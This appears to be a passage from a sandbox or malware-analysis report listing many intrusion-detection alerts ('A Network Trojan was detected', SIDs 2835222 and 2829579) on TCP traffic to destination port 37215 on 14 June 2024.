                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084031
                SID:2835222
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668969
                SID:2829579
                Source Port:60738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368978
                SID:2829579
                Source Port:59776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149930
                SID:2835222
                Source Port:44746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132186
                SID:2829579
                Source Port:40522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368037
                SID:2829579
                Source Port:58954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470278
                SID:2829579
                Source Port:51880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322377
                SID:2829579
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978584
                SID:2829579
                Source Port:35808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028050
                SID:2829579
                Source Port:59598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779099
                SID:2829579
                Source Port:42726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987209
                SID:2829579
                Source Port:59546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729360
                SID:2829579
                Source Port:55776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726702
                SID:2835222
                Source Port:32926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324725
                SID:2829579
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813456
                SID:2829579
                Source Port:39022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779502
                SID:2829579
                Source Port:49254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763368
                SID:2835222
                Source Port:57338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671484
                SID:2829579
                Source Port:54596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151852
                SID:2829579
                Source Port:57010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715230
                SID:2829579
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942702
                SID:2835222
                Source Port:60372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941657
                SID:2829579
                Source Port:38838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152553
                SID:2829579
                Source Port:33632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150424
                SID:2829579
                Source Port:46660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715716
                SID:2835222
                Source Port:58492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969529
                SID:2835222
                Source Port:46354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325748
                SID:2829579
                Source Port:36120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179720
                SID:2835222
                Source Port:42372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943725
                SID:2835222
                Source Port:46668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504869
                SID:2835222
                Source Port:45498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198333
                SID:2829579
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015498
                SID:2835222
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072035
                SID:2829579
                Source Port:48554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968205
                SID:2829579
                Source Port:57258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565351
                SID:2829579
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160848
                SID:2829579
                Source Port:48812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788741
                SID:2835222
                Source Port:56682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421896
                SID:2835222
                Source Port:45314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806672
                SID:2829579
                Source Port:34662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366215
                SID:2835222
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850299
                SID:2829579
                Source Port:38724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941962
                SID:2835222
                Source Port:53920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716522
                SID:2835222
                Source Port:36358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.142947
                SID:2835222
                Source Port:55410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381126
                SID:2835222
                Source Port:34274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991672
                SID:2829579
                Source Port:50456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808414
                SID:2835222
                Source Port:56758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2829579
                Source Port:48262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017759
                SID:2835222
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246146
                SID:2829579
                Source Port:37474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277239
                SID:2829579
                Source Port:54250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133045
                SID:2829579
                Source Port:37240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722553
                SID:2829579
                Source Port:60448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369389
                SID:2829579
                Source Port:39868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069738
                SID:2835222
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412022
                SID:2829579
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473448
                SID:2835222
                Source Port:45702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567315
                SID:2829579
                Source Port:38342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086757
                SID:2835222
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411713
                SID:2835222
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803939
                SID:2829579
                Source Port:47566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717971
                SID:2829579
                Source Port:47934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183260
                SID:2835222
                Source Port:59150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915243
                SID:2835222
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999487
                SID:2829579
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828278
                SID:2829579
                Source Port:59698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411526
                SID:2829579
                Source Port:38480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861383
                SID:2835222
                Source Port:50738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700431
                SID:2835222
                Source Port:60846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677505
                SID:2835222
                Source Port:52090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227988
                SID:2835222
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807232
                SID:2835222
                Source Port:58598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369039
                SID:2829579
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340988
                SID:2835222
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549117
                SID:2829579
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668157
                SID:2835222
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965879
                SID:2829579
                Source Port:55816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999920
                SID:2835222
                Source Port:44556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682602
                SID:2829579
                Source Port:47920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702313
                SID:2835222
                Source Port:55910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289152
                SID:2829579
                Source Port:60304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052582
                SID:2835222
                Source Port:59016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151673
                SID:2835222
                Source Port:55930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031284
                SID:2835222
                Source Port:47170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762573
                SID:2829579
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846879
                SID:2829579
                Source Port:59282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685448
                SID:2835222
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808077
                SID:2829579
                Source Port:59746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519711
                SID:2835222
                Source Port:37920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029650
                SID:2835222
                Source Port:35624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972503
                SID:2829579
                Source Port:33784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245020
                SID:2829579
                Source Port:41596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276547
                SID:2835222
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143523
                SID:2835222
                Source Port:51060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341374
                SID:2835222
                Source Port:51022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979684
                SID:2829579
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471934
                SID:2835222
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943669
                SID:2829579
                Source Port:43240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660938
                SID:2829579
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253766
                SID:2829579
                Source Port:51894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564979
                SID:2835222
                Source Port:40402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762106
                SID:2829579
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177469
                SID:2829579
                Source Port:45370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177865
                SID:2835222
                Source Port:51720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019663
                SID:2835222
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273328
                SID:2835222
                Source Port:50922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790892
                SID:2829579
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762783
                SID:2835222
                Source Port:45100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681939
                SID:2835222
                Source Port:49174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704674
                SID:2835222
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828016
                SID:2835222
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988923
                SID:2835222
                Source Port:60406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880002
                SID:2835222
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791772
                SID:2829579
                Source Port:54490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111492
                SID:2835222
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850582
                SID:2835222
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289191
                SID:2829579
                Source Port:55038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934993
                SID:2835222
                Source Port:58686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905919
                SID:2829579
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164909
                SID:2835222
                Source Port:42126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148029
                SID:2829579
                Source Port:33358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182180
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762479
                SID:2835222
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762746
                SID:2829579
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717019
                SID:2829579
                Source Port:59488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383037
                SID:2829579
                Source Port:50664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324029
                SID:2829579
                Source Port:34040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850017
                SID:2829579
                Source Port:47664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969226
                SID:2829579
                Source Port:40266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366059
                SID:2829579
                Source Port:37992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860151
                SID:2829579
                Source Port:40790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772454
                SID:2835222
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850508
                SID:2829579
                Source Port:36668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420774
                SID:2835222
                Source Port:53556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052838
                SID:2829579
                Source Port:45728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031868
                SID:2835222
                Source Port:41550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916139
                SID:2835222
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020425
                SID:2829579
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805750
                SID:2835222
                Source Port:42212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471575
                SID:2829579
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671160
                SID:2829579
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019972
                SID:2835222
                Source Port:41634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763486
                SID:2835222
                Source Port:47930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616045
                SID:2829579
                Source Port:50060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704115
                SID:2835222
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763022
                SID:2829579
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164732
                SID:2829579
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028743
                SID:2829579
                Source Port:41582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383590
                SID:2835222
                Source Port:41652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423654
                SID:2835222
                Source Port:41174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160780
                SID:2835222
                Source Port:38448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382903
                SID:2835222
                Source Port:55750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288939
                SID:2829579
                Source Port:52896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160042
                SID:2829579
                Source Port:36468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131736
                SID:2835222
                Source Port:55976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547466
                SID:2835222
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412062
                SID:2835222
                Source Port:40216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450492
                SID:2835222
                Source Port:54562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729890
                SID:2835222
                Source Port:59714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071396
                SID:2829579
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967486
                SID:2835222
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967799
                SID:2835222
                Source Port:33046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565397
                SID:2835222
                Source Port:38040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809470
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149474
                SID:2835222
                Source Port:45010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682259
                SID:2835222
                Source Port:36334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152728
                SID:2829579
                Source Port:60170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675324
                SID:2835222
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227370
                SID:2835222
                Source Port:44904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662414
                SID:2835222
                Source Port:54522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406962
                SID:2829579
                Source Port:50510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384585
                SID:2835222
                Source Port:35346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013138
                SID:2829579
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737666
                SID:2835222
                Source Port:57206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201010
                SID:2829579
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941004
                SID:2835222
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032807
                SID:2829579
                Source Port:36586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367026
                SID:2829579
                Source Port:55042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715856
                SID:2835222
                Source Port:58584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504038
                SID:2829579
                Source Port:51836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997157
                SID:2829579
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803535
                SID:2835222
                Source Port:60732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704091
                SID:2835222
                Source Port:54138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520543
                SID:2829579
                Source Port:44388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765183
                SID:2829579
                Source Port:50816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180911
                SID:2835222
                Source Port:54532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900139
                SID:2829579
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074245
                SID:2829579
                Source Port:42782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425151
                SID:2835222
                Source Port:50400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517427
                SID:2829579
                Source Port:39940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764900
                SID:2835222
                Source Port:50772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073823
                SID:2835222
                Source Port:47380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704602
                SID:2829579
                Source Port:38252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977956
                SID:2835222
                Source Port:48650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722379
                SID:2835222
                Source Port:45888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021881
                SID:2829579
                Source Port:47862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
